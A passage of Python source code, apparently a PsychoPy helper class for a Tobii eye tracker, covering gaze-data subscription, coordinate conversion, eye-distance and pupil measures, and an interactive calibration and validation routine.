elif not isinstance(nameString, basestring):
raise TypeError("Monitor name must be formatted as a string.")
# if monitor name is given as a string
else:
# create monitor calibration object
thisMon = monitors.Monitor(nameString)
print("Current monitor name is: " + nameString)
# set monitor dimensions
thisMon.setSizePix(dimensions)
# save monitor
thisMon.saveMon() # save monitor calibration
self.win = thisMon
# ----- Functions for starting and stopping eyetracker data collection -----
# function for broadcasting real time gaze data
def gazeDataCallback(self,startGazeData):
self.gazeData = startGazeData
# function for subscribing to real time gaze data from eyetracker
def startGazeData(self):
# check to see if eyetracker is there
if self.eyetracker is None:
raise ValueError("There is no eyetracker.")
# if it is, proceed
print("Subscribing to eyetracker.")
self.eyetracker.subscribe_to(tobii.EYETRACKER_GAZE_DATA,
self.gazeDataCallback,
as_dictionary = True)
self.tracking = True
# function for unsubscribing from gaze data
def stopGazeData(self):
# check to see if eyetracker is there
if self.eyetracker is None:
raise ValueError("There is no eyetracker.")
# if it is, proceed
print("Unsubscribing from eyetracker")
self.eyetracker.unsubscribe_from(tobii.EYETRACKER_GAZE_DATA,
self.gazeDataCallback)
self.tracking = False
# ----- Helper functions -----
# function for checking tracker and computer synchronization
def timeSyncCallback(self, timeSyncData):
self.syncData = timeSyncData
# broadcast synchronization data
def startSyncData(self):
#check that eyetracker is connected
if self.eyetracker is None:
raise ValueError('Eyetracker is not connected.')
# if it is, proceed
print("Subscribing to time synchronization data")
self.eyetracker.subscribe_to(tobii.EYETRACKER_TIME_SYNCHRONIZATION_DATA,
self.timeSyncCallback,
as_dictionary=True)
# stop broadcasting synchronization data
def stopSyncData(self):
self.eyetracker.unsubscribe_from(tobii.EYETRACKER_TIME_SYNCHRONIZATION_DATA,
self.timeSyncCallback)
print("Unsubscribed from time synchronization data.")
# function for converting positions from trackbox coordinate system (mm) to
# normalized active display area coordinates
def tb2Ada(self, xyCoor = tuple):
# check argument values
if xyCoor is None:
raise ValueError("No coordinate values have been specified.")
elif not isinstance(xyCoor, tuple):
raise TypeError("XY coordinates must be given as tuple.")
elif isinstance(xyCoor, tuple) and len(xyCoor) != 2:
raise ValueError("Wrong number of coordinate dimensions")
# check tracker box and ada coordinates
if self.tbCoordinates is None or self.adaCoordinates is None:
raise ValueError("Missing trackbox coordinates. \n" +\
"Try running getTrackerSpace()")
# get tb and ada values from eyetracker
tbDict = self.tbCoordinates
tbLowLeft = (tbDict.get('bottomLeft')[0],
tbDict.get('bottomLeft')[1])
adaDict = self.adaCoordinates
adaLowLeft = ((adaDict.get('width')/-2),
(adaDict.get('height')/-2))
# create ratios for x and y coordinates
yRatio = tbLowLeft[1]/adaLowLeft[1]
xRatio = tbLowLeft[0]/adaLowLeft[0]
# convert and return coordinates
adaNorm = ((xyCoor[0] * xRatio), (xyCoor[1] * yRatio))
return adaNorm
# function for converting normalized trackbox coordinates to normalized coordinates
# based on the psychopy window
def tb2PsychoNorm(self, xyCoor = tuple):
# check argument values
if xyCoor is None:
raise ValueError("No coordinate values have been specified.")
elif not isinstance(xyCoor, tuple):
raise TypeError("XY coordinates must be given as tuple.")
elif isinstance(xyCoor, tuple) and len(xyCoor) != 2:
raise ValueError("Wrong number of coordinate dimensions")
# convert track box coordinates to ada coordinates
adaCoors = self.tb2Ada(xyCoor)
# correct for psychopy window coordinates
centerScale = self.tb2Ada((1, 1))
centerShift = ((centerScale[0] / 2), (centerScale[1] / 2))
psychoNorm = (adaCoors[0] - centerShift[0],
adaCoors[1] - centerShift[1])
# return coordinates in psychowin 'norm' units
return psychoNorm
# function for converting from Tobii's ada coordinate system in normalized
# coordinates where (0,0) is the upper left corner, to psychopy window
# coordinates in pix, where (0,0) is at the center of psychopy window.
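# Worked example of the mapping above (assuming a 1920x1080 psychopy window):
# ada (0.5, 0.5) -> pix (0, 0) at the centre, ada (0.0, 0.0) (upper left) -> (-960, 540),
# and ada (1.0, 1.0) (lower right) -> (960, -540).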
def ada2PsychoPix(self, xyCoor = tuple):
# check argument values
if xyCoor is None:
raise ValueError("No coordinate values have been specified.")
elif not isinstance(xyCoor, tuple):
raise TypeError("XY coordinates must be given as tuple.")
elif isinstance(xyCoor, tuple) and len(xyCoor) != 2:
raise ValueError("Wrong number of coordinate dimensions")
if np.isnan(xyCoor[0]) and np.isnan(xyCoor[1]):
psychoPix = (np.nan, np.nan)
return psychoPix
# convert to pixels and correct for psychopy window coordinates
monHW = (self.win.getSizePix()[0],
self.win.getSizePix()[1])
wShift, hShift = monHW[0] / 2 , monHW[1] / 2
psychoPix = ((((xyCoor[0]* monHW[0]) - wShift)),
(((xyCoor[1] * monHW[1]) - hShift) * -1))
# return coordinates in psychowin 'pix' units
return psychoPix
# function for converting from Tobii's active display coordinate system in
# normalized coordinates where (0,0) is the upper left corner, to monitor
# coordinates in pix, where (0,0) is the upper left corner
def ada2MonPix(self, xyCoor = tuple):
# check argument values
if xyCoor is None:
raise ValueError("No coordinate values have been specified.")
elif not isinstance(xyCoor, tuple):
raise TypeError("XY coordinates must be given as tuple.")
elif isinstance(xyCoor, tuple) and len(xyCoor) != 2:
raise ValueError("Wrong number of coordinate dimensions")
if np.isnan(xyCoor[0]) and np.isnan(xyCoor[1]):
monPix = (np.nan, np.nan)
return monPix
# convert so point of gaze on monitor is accurate
monPix = (int(xyCoor[0] * self.win.getSizePix()[0]),
int(xyCoor[1] * self.win.getSizePix()[1]))
return monPix
# ----- Functions for collecting eye and gaze data -----
# function for collecting gaze coordinates in psychopy pixel coordinate
# system. currently written to return the average (x, y) position of both
# eyes, but can be easily rewritten to return data from one or both eyes
def getAvgGazePos(self):
# check to see if the eyetracker is connected and turned on
if self.eyetracker is None:
raise ValueError("There is no eyetracker.")
if self.tracking is False:
raise ValueError("The eyetracker is not turned on.")
# while tracking
while True:
# access gaze data dictionary to get gaze position tuples
lGazeXYZ = self.gazeData['left_gaze_point_on_display_area']
rGazeXYZ = self.gazeData['right_gaze_point_on_display_area']
# get 2D gaze positions for left and right eye
xs = (lGazeXYZ[0], rGazeXYZ[0])
ys = (lGazeXYZ[1], rGazeXYZ[1])
# if both eyes have gaze data on both axes
if all([x != -1.0 for x in xs]) and all([y != -1.0 for y in ys]):
# take x and y averages
avgGazePos = np.nanmean(xs), np.nanmean(ys)
else:
# or if no data, hide points by showing off screen
avgGazePos = (np.nan, np.nan)
return self.ada2PsychoPix(avgGazePos)
# function for finding the avg 3d position of subject's eyes, so that they
# can be drawn in the virtual track box before calibration. The x and y
# coordinates are returned in normalized "tobii track box" units.
def trackboxEyePos(self):
# check to see if the eyetracker is connected and turned on
if self.eyetracker is None:
raise ValueError("There is no eyetracker.")
if self.tracking is False:
raise ValueError("The eyetracker is not turned on.")
# while tracking
while True:
# access gaze data dictionary to get eye position tuples,
# in trackbox coordinate system
lTbXYZ = self.gazeData['left_gaze_origin_in_trackbox_coordinate_system']
rTbXYZ = self.gazeData['right_gaze_origin_in_trackbox_coordinate_system']
# left eye validity
lVal = self.gazeData['left_gaze_origin_validity']
# right eye validity
rVal = self.gazeData['right_gaze_origin_validity']
# if left eye is found by the eyetracker
if lVal == 1:
# update the left eye positions if the values are reasonable
# scale left eye position so that it fits in track box
leftTbPos = (-self.tb2PsychoNorm((lTbXYZ[0],
lTbXYZ[1]))[0] * 1.7,
self.tb2PsychoNorm((lTbXYZ[0],
lTbXYZ[1]))[1])
else:
# hide by drawing in the corner
leftTbPos = [0.99, 0.99]
# if right eye is found by the eyetracker
if rVal == 1:
# update the right eye positions if the values are reasonable
# scale right eye position so that it fits in track box
rightTbPos = (-self.tb2PsychoNorm((rTbXYZ[0], rTbXYZ[1]))[0] * 1.7,
self.tb2PsychoNorm((rTbXYZ[0],
rTbXYZ[1]))[1])
else:
# hide by drawing in the corner
rightTbPos = [0.99, 0.99]
# return values for position in track box
return leftTbPos, rightTbPos
# x, y, and z dimensions are given in mm from the tracker origin, gives the
# average 3d position of both eyes, but can be easily rewritten to yield
# the position of each eye separately
def getAvgEyePos(self):
# check to see if the eyetracker is connected and turned on
if self.eyetracker is None:
raise ValueError("There is no eyetracker.")
if self.tracking is False:
raise ValueError("The eyetracker is not turned on.")
# while tracking
while True:
# access gaze data dictionary to get eye position tuples, given in
# mm from the eyetracker origin
lOriginXYZ = self.gazeData['left_gaze_origin_in_user_coordinate_system']
rOriginXYZ = self.gazeData['right_gaze_origin_in_user_coordinate_system']
# create arrays with positions of both eyes on x, y, and z axes
xs = (lOriginXYZ[0],rOriginXYZ[0])
ys = (lOriginXYZ[1],rOriginXYZ[1])
zs = (lOriginXYZ[2],rOriginXYZ[2])
# if all of the axes have data from at least one eye
if not (np.isnan(xs)).all() or not (np.isnan(ys)).all() or not (np.isnan(zs)).all():
# update the distance if the values are reasonable
avgEyePos = (np.nanmean(xs), np.nanmean(ys), np.nanmean(zs))
else:
# otherwise set to zero
avgEyePos = (0, 0, 0)
# return average eye position in mm
return avgEyePos
# get average distance of the eyes from the tracker origin, given in cm
def getAvgEyeDist(self):
# check to see if the eyetracker is connected and turned on
if self.eyetracker is None:
raise ValueError("There is no eyetracker.")
if self.tracking is False:
raise ValueError("The eyetracker is not turned on.")
# while tracking
while True:
# get eye positions
eyeCoors = self.getAvgEyePos()
# if eyes were found
if sum(eyeCoors) > 0:
# calculate the euclidean distance of eyes from tracker origin
avgEyeDist = distance.euclidean((eyeCoors[0]/10,
eyeCoors[1]/10,
eyeCoors[2]/10), (0, 0, 0))
else: # if eyes were not found, return zero values
avgEyeDist = 0
# return distance value in cm
return avgEyeDist
# get average size of pupils in mm, can easily be rewritten to return
# pupil size values for both eyes
def getPupilSize(self):
# check to see if the eyetracker is connected and turned on
if self.eyetracker is None:
raise ValueError("There is no eyetracker.")
if self.tracking is False:
raise ValueError("The eyetracker is not turned on.")
# while tracking
while True:
lPup = self.gazeData['left_pupil_diameter']
rPup = self.gazeData['right_pupil_diameter']
pupSizes = (lPup, rPup)
# if pupils were found
if lPup != -1 and rPup != -1:
avgPupSize = np.nanmean(pupSizes)
else: # otherwise return zero
avgPupSize = (0.0)
# return pupil size
return avgPupSize
# check the validities of right and left eyes, returns as a tuple of
# true/false values
def checkEyeValidities(self):
# check to see if the eyetracker is connected and turned on
if self.eyetracker is None:
raise ValueError("There is no eyetracker.")
if self.tracking is False:
raise ValueError("The eyetracker is not turned on.")
# while tracking
while True:
# get validity values
lVal = self.gazeData['left_gaze_origin_validity']
rVal = self.gazeData['right_gaze_origin_validity']
# default validity value
validities = 0 # neither eye is valid
# if both eyes are valid, return 3
if lVal == 1 and rVal == 1:
validities = 3
# if just left eye is valid, return 1
elif lVal == 1 and rVal == 0:
validities = 1
# if just right eye is valid, return 2
elif lVal == 0 and rVal == 1 :
validities = 2
# return validity values
return validities
# ----- Functions for running calibration -----
# function for drawing representation of the eyes in virtual trackbox
def drawEyePositions(self, psychoWin):
# check that psychopy window exists
if psychoWin is None:
raise ValueError("There is no psychopy window available. " +\
"Try calling runTrackbox() instead.")
# Set default colors
correctColor = [-1.0, 1.0, -1.0]
mediumColor = [1.0, 1.0, 0.0]
wrongColor = [1.0, -1.0, -1.0]
# rectangle for viewing eyes
rectScale = self.tb2Ada((1, 1))
eyeArea = visual.Rect(psychoWin,
fillColor = [0.0, 0.0, 0.0],
lineColor = [0.0, 0.0, 0.0],
pos = [0.0, 0.0],
units = 'norm',
lineWidth = 3,
width = rectScale[0],
height = rectScale[1])
# Make stimuli for the left and right eye
leftStim = visual.Circle(psychoWin,
fillColor = eyeArea.fillColor,
units = 'norm',
radius = 0.07)
rightStim = visual.Circle(psychoWin,
fillColor = eyeArea.fillColor,
units = 'norm',
radius = 0.07)
# Make a dummy message
findmsg = visual.TextStim(psychoWin,
text = " ",
color = [1.0, 1.0, 1.0],
units = 'norm',
pos = [0.0, -0.65],
height = 0.07)
# while tracking
while True:
# find and update eye positions
leftStim.pos, rightStim.pos = self.trackboxEyePos()
eyeDist = self.getAvgEyeDist()
# change color depending on distance
if eyeDist >= 55 and eyeDist <= 75:
# correct distance
leftStim.fillColor, leftStim.lineColor = correctColor, correctColor
rightStim.fillColor, rightStim.lineColor = correctColor, correctColor
elif eyeDist <= 54 and eyeDist >= 45 or eyeDist >= 76 and eyeDist <= 85:
leftStim.fillColor, leftStim.lineColor = mediumColor, mediumColor
rightStim.fillColor, rightStim.lineColor = mediumColor, mediumColor
else:
# distance is outside the acceptable range
leftStim.fillColor, leftStim.lineColor = wrongColor, wrongColor
rightStim.fillColor, rightStim.lineColor = wrongColor, wrongColor
# if left eye is not found, don't display eye
if leftStim.pos[0] == 0.99:
leftStim.fillColor = psychoWin.color # make the same color as bkg
leftStim.lineColor = psychoWin.color
# if right eye is not found, don't display eye
if rightStim.pos[0] == 0.99:
rightStim.fillColor = psychoWin.color # make same color as bkg
rightStim.lineColor = psychoWin.color
# give distance feedback
findmsg.text = "You're currently " + \
str(int(eyeDist)) + \
("cm away from the screen. \n"
"Press 'c' to calibrate or 'q' to abort.")
# update stimuli in window
eyeArea.draw()
leftStim.draw()
rightStim.draw()
findmsg.draw()
psychoWin.flip()
# depending on response, either abort script or continue to calibration
if event.getKeys(keyList=['q']):
self.stopGazeData()
psychoWin.close()
pcore.quit()
raise KeyboardInterrupt("You aborted the script manually.")
elif event.getKeys(keyList=['c']):
print("Proceeding to calibration.")
self.stopGazeData()
psychoWin.flip()
return
# clear events not accessed this iteration
event.clearEvents(eventType='keyboard')
# function for running validation routine post calibration to check
# calibration precision and accuracy
def runValidation(self, pointDict = dict):
# check the values of the point dictionary
if pointDict is None:
print('pointDict has no value. Using 5 point default.')
pointList = [('1',(0.1, 0.1)), ('2',(0.9, 0.1)), ('3',(0.5, 0.5)),
('4',(0.1, 0.9)), ('5',(0.9, 0.9))]
pointDict = collections.OrderedDict(pointList)
if not isinstance(pointDict, dict):
raise TypeError('pointDict must be a dictionary with number ' +\
'keys and coordinate values.')
# check window attribute
if self.win is None:
raise ValueError('No experimental monitor has been specified.\n' +\
'Try running setMonitor().')
# start eyetracker
self.startGazeData()
# let it warm up briefly
pcore.wait(0.5)
# get points from dictionary
curPoints = pointDict.values()
# convert points from normalized ada units to psychopy pix
pointPositions = [self.ada2PsychoPix(x) for x in curPoints]
# window stimuli
valWin = visual.Window(size = [self.win.getSizePix()[0],
self.win.getSizePix()[1]],
pos = [0, 0],
units = 'pix',
fullscr = True,
allowGUI = True,
monitor = self.win,
winType = 'pyglet',
color = [0.8, 0.8, 0.8])
# stimuli for showing point of gaze
gazeStim = visual.Circle(valWin,
radius = 50,
lineColor = [1.0, 0.95, 0.0], # yellow circle
fillColor = [1.0, 1.0, 0.55], # light interior
lineWidth = 40,
units = 'pix')
# Make a dummy message
valMsg = visual.TextStim(valWin,
text = 'Wait for the experimenter.',
color = [0.4, 0.4, 0.4], # grey
units = 'norm',
pos = [0.0, -0.5],
height = 0.07)
# Stimuli for all validation points
valPoints = visual.Circle(valWin,
units = "pix",
radius = 20,
lineColor = [1.0, -1.0, -1.0], # red
fillColor = [1.0, -1.0, -1.0]) # red
# create array for smoothing gaze position
gazePositions = np.array([0.0, 0.0])
maxLength = 6
# while tracking
while True:
# smooth gaze data with moving window
gazePositions = np.vstack((gazePositions,
np.array(self.getAvgGazePos())))
curPos = np.nanmean(gazePositions, axis = 0)
# remove previous position values
if len(gazePositions) == maxLength:
gazePositions = np.delete(gazePositions, 0, axis = 0)
# update stimuli in window and draw
drawStim = self.ada2PsychoPix(tuple(curPos))
# draw gaze position only if found
if drawStim[0] != self.win.getSizePix()[0]:
gazeStim.pos = drawStim
gazeStim.draw()
# points
for point in pointPositions:
valPoints.pos = point
valPoints.draw()
# text
valMsg.draw()
valWin.flip()
# depending on response, either abort script or continue to calibration
if event.getKeys(keyList=['q']):
valWin.close()
self.stopGazeData()
pcore.quit()
raise KeyboardInterrupt("You aborted the script manually.")
elif event.getKeys(keyList=['c']):
valWin.close()
print("Exiting calibration validation.")
self.stopGazeData()
return
# clear events not accessed this iteration
event.clearEvents(eventType='keyboard')
# function for getting the average left and right gaze position coordinates
# for each calibration point in psychopy pix units
def calculateCalibration(self, calibResult):
# check the values of the point dictionary
if calibResult is None:
raise ValueError('No argument passed for calibResult')
#create an empty list to hold values
calibDrawCoor = []
# iterate through calibration points
for i in range(len(calibResult.calibration_points)):
# current point
curPoint = calibResult.calibration_points[i]
pointPosition = curPoint.position_on_display_area # point position
pointSamples = curPoint.calibration_samples # samples at point
# empty arrays for holding left and right eye gaze coordinates
leftOutput = np.zeros((len(pointSamples), 2))
rightOutput = np.zeros((len(pointSamples), 2))
# find left and right gaze coordinates for all samples in point
for j in range(len(pointSamples)):
curSample = pointSamples[j]
leftEye = curSample.left_eye
rightEye = curSample.right_eye
leftOutput[j] = leftEye.position_on_display_area
rightOutput[j] = rightEye.position_on_display_area
# get average x and y coordinates using all samples in point
lXY = tuple(np.mean(leftOutput, axis = 0))
rXY = tuple(np.mean(rightOutput, axis = 0))
point = tuple((pointPosition[0], pointPosition[1]))
# put current calibration point coordinates, left and right eye coordinates
# into a list, and convert to psychopy window coordinates in pix
newList = [self.ada2PsychoPix(point), self.ada2PsychoPix(lXY),
self.ada2PsychoPix(rXY), pointPosition]
calibDrawCoor.insert(i, newList)
# for some weird reason my calibration always includes the point (0,0) at
# index 0, so just remove it here
calibDrawCoor.pop(0)
# return as list
return(calibDrawCoor)
# function for drawing the results of the calibration
def drawCalibrationResults(self, calibResult = None, calibWin = None, curDict = dict):
# check argument values
if self.calibration is None:
raise ValueError('No calibration object exists.')
# check values of calibration result
if calibResult is None:
raise ValueError('No calibration result object given.')
# check the values of the point dictionary
if curDict is None:
raise ValueError('No dictionary object given.')
elif not isinstance(curDict, dict):
raise TypeError('curDict must be a dictionary with number \n' +\
'keys and coordinate values.')
# check value of calibration window
if calibWin is None:
raise ValueError('No psychopy window object given.')
# get gaze position results
points2Draw = self.calculateCalibration(calibResult)
# create stimuli objects for drawing
# outlined empty circle object for showing calibration point
calibPoint = visual.Circle(calibWin,
radius = 50,
lineColor = [1.0, 1.0, 1.0], # white
lineWidth = 10,
fillColor = calibWin.color,
units = 'pix',
pos = (0.0, 0.0))
# line object for showing right eye gaze position during calibration
rightEyeLine = visual.Line(calibWin,
units ='pix',
lineColor ='red',
lineWidth = 20,
start = (0.0, 0.0),
end = (0.0, 0.0))
# line object for showing left eye gaze position during calibration
leftEyeLine = visual.Line(calibWin,
units ='pix',
lineColor ='yellow',
lineWidth = 20,
start = (0.0, 0.0),
end = (0.0, 0.0))
# number for identifying point in dictionary
pointText = visual.TextStim(calibWin,
text = " ",
color = [0.8, 0.8, 0.8], # lighter than bkg
units = 'pix',
pos = [0.0, 0.0],
height = 60)
# Make a dummy message
checkMsg = visual.TextStim(calibWin,
text = 'Wait for the experimenter.',
color = [1.0, 1.0, 1.0],
units = 'norm',
pos = [0.0, -0.5],
height = 0.07)
# make empty lists for holding points to be recalibrated
holdRedoDict = []
holdColorPoints = []
# clear events not accessed this iteration
event.clearEvents(eventType='keyboard')
# draw and update screen
while True:
# iterate through calibration points and draw
for i in range(len(points2Draw)):
# update point and calibration results for both eyes
point = points2Draw[i]
pointPos = point[3]
pointKey = 0
# update text
for key, point in curDict.items():
if point == pointPos:
pointText.text = key
pointKey = key
# if current point is selected for recalibrate, make it noticeable
if int(pointKey) in holdColorPoints:
calibPoint.lineColor = [-1.0, 1.0, -1.0] # green circle
else:
calibPoint.lineColor = [1.0, 1.0, 1.0] # no visible change
# update point and calibration results for both eyes
point = points2Draw[i]
startCoor, leftCoor, rightCoor = point[0], point[1], point[2]
# update positions and draw on window
calibPoint.pos = startCoor # calibration point
leftEyeLine.start = startCoor # left eye
leftEyeLine.end = leftCoor
rightEyeLine.start = startCoor # right eye
rightEyeLine.end = rightCoor
pointText.pos = startCoor # point text
# update stimuli in window
calibPoint.draw() # has to come first or else will cover other
# stim
pointText.draw()
leftEyeLine.draw()
rightEyeLine.draw()
checkMsg.draw()
# show points and lines on window
calibWin.flip()
# determine problem points
# list of acceptable key input !!IF PRESSED KEYS ARE NOT IN KEYLIST, KEYBOARD EVENT MAY CRASH!!
pressedKeys = event.getKeys(keyList = ['c', 'q', '1', '2', '3', '4',
'5', '6', '7', '8', '9'])
# depending on response, either...
# abort script
for key in pressedKeys:
if key in ['q']:
calibWin.close()
self.calibration.leave_calibration_mode()
pcore.quit()
raise KeyboardInterrupt("You aborted the script manually.")
# else if recalibration point is requested
elif key in curDict.keys():
# iterate through each of these presses
for entry in curDict.items():
# if the key press is the same as the current dictionary key
if entry[0] == key:
# append that dictionary entry into a holding dictionary
holdRedoDict.append(entry)
# append integer version to a holding list
holdColorPoints.append(int(key))
# continue with calibration procedure
elif key in ['c']:
print("Finished checking. Resuming calibration.")
checkMsg.pos = (0.0, 0.0)
checkMsg.text = ("Finished checking. Resuming calibration.")
checkMsg.draw()
calibWin.flip()
# return dictionary of points to be recalibrated
redoDict = collections.OrderedDict([]) # empty dictionary for holding unique values
# don't put repeats in the resulting dictionary
tempDict = collections.OrderedDict(holdRedoDict)
for keys in tempDict.keys():
if keys not in redoDict.keys():
redoDict[keys] = tempDict.get(keys)
# return dictionary
return redoDict
# clear events not accessed this iteration
event.clearEvents(eventType='keyboard')
# function for drawing calibration points, collecting and applying
# calibration data
def getCalibrationData(self, calibWin, pointList = list):
# check argument values
if self.calibration is None:
raise ValueError('No calibration object exists.\n' +\
'Try running runFullCalibration()')
# check value of calibration window
if calibWin is None:
raise ValueError('No psychopy window object given')
# check the values of the point dictionary
if pointList is None:
raise ValueError('No list object given for pointList.')
elif not isinstance(pointList, list):
raise TypeError('pointList must be a list of coordinate tuples.')
# defaults
pointSmallRadius = 5.0 # point radius
pointLargeRadius = pointSmallRadius * 10.0
moveFrames = 50 # number of frames to draw between points
startPoint = (0.90, 0.90) # starter point for animation
# calibration point visual object
calibPoint = visual.Circle(calibWin,
radius = pointLargeRadius,
lineColor = [1.0, -1.0, -1.0], # red
fillColor = [1.0, -1.0, -1.0],
units = 'pix')
# draw animation for each point
# converting psychopy window coordinate units from normal to px
for i in range(len(pointList)):
# if first point draw starting point
if i == 0:
firstPoint = [startPoint[0], startPoint[1]]
secondPoint = [pointList[i][0], pointList[i][1]]
else:
firstPoint = [pointList[i - 1][0], pointList[i - 1][1]]
secondPoint = [pointList[i][0], pointList[i][1]]
# draw and move dot
# step size for dot movement is new - old divided by frames
pointStep = [((secondPoint[0] - firstPoint[0]) / moveFrames),
((secondPoint[1] - firstPoint[1]) / moveFrames)]
# Move the point in position (smooth pursuit)
for frame in range(moveFrames - 1):
firstPoint[0] += pointStep[0]
firstPoint[1] += pointStep[1]
# draw & flip
calibPoint.pos = self.ada2PsychoPix(tuple(firstPoint))
calibPoint.draw()
calibWin.flip()
# wait to let eyes settle
pcore.wait(0.5)
# allow the eye to focus before beginning calibration
# point size change step
radiusStep = ((pointLargeRadius - pointSmallRadius) / moveFrames)
# Shrink the outer point (gaze fixation) to encourage focusing
for frame in range(moveFrames):
pointLargeRadius -= radiusStep
calibPoint.radius = pointLargeRadius
calibPoint.draw()
calibWin.flip()
# first wait to let the eyes settle
pcore.wait(0.5)
# conduct calibration of point
print("Collecting data at {0}." .format(i + 1))
while self.calibration.collect_data(pointList[i][0],
pointList[i][1]) != tobii.CALIBRATION_STATUS_SUCCESS:
self.calibration.collect_data(pointList[i][0],
pointList[i][1])
# feedback from calibration
print("{0} for data at point {1}."
.format(self.calibration.collect_data(pointList[i][0],
pointList[i][1]), i + 1))
pcore.wait(0.3) # wait before continuing
# Return point to original size
for frame in range(moveFrames):
pointLargeRadius += radiusStep
calibPoint.radius = pointLargeRadius
calibPoint.draw()
calibWin.flip()
# let the eyes settle and move to the next point
pcore.wait(0.2)
# check to quit
# depending on response, either abort script or continue to calibration
if event.getKeys(keyList=['q']):
calibWin.close()
self.calibration.leave_calibration_mode()
raise KeyboardInterrupt("You aborted the script manually.")
return
# clear events not accessed this iteration
event.clearEvents(eventType='keyboard')
# clear screen
calibWin.flip()
# print feedback
print("Computing and applying calibration.")
# compute and apply calibration to get calibration result object
calibResult = self.calibration.compute_and_apply()
# return calibration result
return calibResult
# function for running a simple gui to visualize subject eye position. Make
# sure that the eyes are in an optimal location for the eye tracker
def runTrackBox(self):
# check to see that eyetracker is connected
if self.eyetracker is None:
raise ValueError('There is no eyetracker object. \n' +\
'Try running findTracker().')
# check window attribute
if self.win is None:
raise ValueError('No experimental monitor has been specified.\n' +\
'Try running setMonitor().')
# start the eyetracker
self.startGazeData()
# wait for it to warm up
pcore.wait(0.5)
# create window for visualizing eye position and text
trackWin = visual.Window(size = [self.win.getSizePix()[0],
self.win.getSizePix()[1]],
pos = [0, 0],
units = 'pix',
fullscr = True,
allowGUI = True,
monitor = self.win,
winType = 'pyglet',
color = [0.4, 0.4, 0.4])
# feedback about eye position
self.drawEyePositions(trackWin)
# close track box
pcore.wait(2)
trackWin.close()
return
# function for running a complete calibration routine
def runFullCalibration(self, numCalibPoints = None):
# check that eyetracker is connected before running
if self.eyetracker is None: # eyeTracker
raise ValueError("No eyetracker is specified. " +\
"Aborting calibration.\n" +\
"Try running findTracker().")
# check window attribute
if self.win is None:
raise ValueError('No experimental monitor has been specified.\n' +\
'Try running setMonitor().')
# create dictionary of calibration points
# if nothing entered then default is nine
if numCalibPoints is None:
pointList = [('1',(0.1, 0.1)), ('2',(0.5, 0.1)), ('3',(0.9, 0.1)),
('4',(0.1, 0.5)), ('5',(0.5, 0.5)), ('6',(0.9, 0.5)),
('7',(0.1, 0.9)), ('8',(0.5, 0.9)), ('9',(0.9, 0.9))]
elif numCalibPoints == 5:
pointList = [('1',(0.1, 0.1)), ('2',(0.9, 0.1)), ('3',(0.5, 0.5)),
('4',(0.1, 0.9)), ('5',(0.9, 0.9))]
elif numCalibPoints == 9:
pointList = [('1',(0.1, 0.1)), ('2',(0.5, 0.1)), ('3',(0.9, 0.1)),
('4',(0.1, 0.5)), ('5',(0.5, 0.5)), ('6',(0.9, 0.5)),
('7',(0.1, 0.9)), ('8',(0.5, 0.9)), ('9',(0.9, 0.9))]
# randomize points as ordered dictionary
np.random.shuffle(pointList)
calibDict = collections.OrderedDict(pointList)
# create window for calibration
calibWin = visual.Window(size = [self.win.getSizePix()[0],
self.win.getSizePix()[1]],
pos = [0, 0],
units = 'pix',
fullscr = True,
allowGUI = True,
monitor = self.win,
winType = 'pyglet',
color = [0.4, 0.4, 0.4])
# stimuli for holding text
calibMessage = visual.TextStim(calibWin,
color = [1.0, 1.0, 1.0], # text
units = 'norm',
height = 0.08,
pos = (0.0, 0.1))
# stimuli for fixation cross
fixCross = visual.TextStim(calibWin,
color = [1.0, 1.0, 1.0],
units = 'norm',
height = 0.1,
pos = (0.0, 0.0),
text = "+")
# track box to position participant
# subject instructions for track box
calibMessage.text = ("Please position yourself so that the\n" + \
"eye-tracker can locate your eyes." + \
"\n\nPress 'c' to continue.")
calibMessage.draw()
calibWin.flip()
# turn keyboard reporting on and get subject response
event.waitKeys(maxWait = 10, keyList = ['c']) # proceed with calibration
#run track box routine
calibWin.flip() # clear previous text
self.runTrackBox()
# initialize calibration
self.calibration = tobii.ScreenBasedCalibration(self.eyetracker) # calib object
# enter calibration mode
self.calibration.enter_calibration_mode()
# subject instructions
calibMessage.text = ("Please focus your eyes on the red dot " + \
"and follow it with your eyes as closely as " + \
"possible.\n\nPress 'c' to continue.")
calibMessage.draw()
calibWin.flip()
# turn keyboard reporting on and get subject response
event.waitKeys(maxWait = 10, keyList = ['c']) # proceed with calibration
# draw a fixation cross
fixCross.draw()
calibWin.flip()
pcore.wait(3)
# create dictionary for holding points to be recalibrated
redoCalDict = calibDict
# loop through calibration process until calibration is complete
while True:
# create point order from randomized dictionary values
pointOrder = list(redoCalDict.values())
# perform calibration
calibResult = self.getCalibrationData(calibWin, pointOrder)
# Check status of calibration result
# if calibration was successful, check calibration results
if calibResult.status != tobii.CALIBRATION_STATUS_FAILURE:
# give feedback
calibMessage.text = ("Applying calibration...")
calibMessage.draw()
calibWin.flip()
pcore.wait(2)
# moving on to accuracy plot
calibMessage.text = ("Calculating calibration accuracy...")
calibMessage.draw()
calibWin.flip()
pcore.wait(2)
# check calibration for poorly calibrated points
redoCalDict = self.drawCalibrationResults(calibResult,
calibWin,
calibDict)
else: # if calibration was not successful, leave and abort
calibMessage.text = ("Calibration was not successful.\n\n" + \
"Closing the calibration window.")
calibMessage.draw()
calibWin.flip()
pcore.wait(3)
calibWin.close()
self.calibration.leave_calibration_mode()
return
# Redo calibration for specific points if necessary
if not redoCalDict: # if no points to redo
# finish calibration
print("Calibration successful. Moving on to validation mode.")
calibMessage.text = ("Calibration was successful.\n\n" + \
"Moving on to validation.")
calibMessage.draw()
calibWin.flip()
pcore.wait(3)
self.calibration.leave_calibration_mode()
# break loop to proceed with validation
break
else: # if any points to redo
# convert list to string for feedback
printString = " ".join(str(x) for x in redoCalDict.keys())
# feedback
print ("Still need to calibrate the following points: %s"
% printString)
calibMessage.text = ("Calibration is almost complete.\n\n" + \
"Prepare to recalibrate a few points.")
calibMessage.draw()
calibWin.flip()
pcore.wait(3)
# draw fixation cross
fixCross.draw()
calibWin.flip()
pcore.wait(3)
# iterate through list of redo points and remove data from calibration
for newPoint in redoCalDict.values():
print(newPoint)
self.calibration.discard_data(newPoint[0], newPoint[1])
# continue with calibration of remaining points
continue
# Validate calibration
# draw fixation cross
fixCross.draw()
calibWin.flip()
pcore.wait(3)
# run validation
self.runValidation(calibDict)
# close window
calibMessage.text = ("Finished validating the calibration.\n\n" +\
"Calibration is complete. Closing window.")
calibMessage.draw()
calibWin.flip()
pcore.wait(3)
calibWin.close()
return
# ----- Functions for exporting gaze data -----
# Function for getting all gaze and event data from the current sample
# collected by the eyetracker, returned as a dictionary. Can easily be
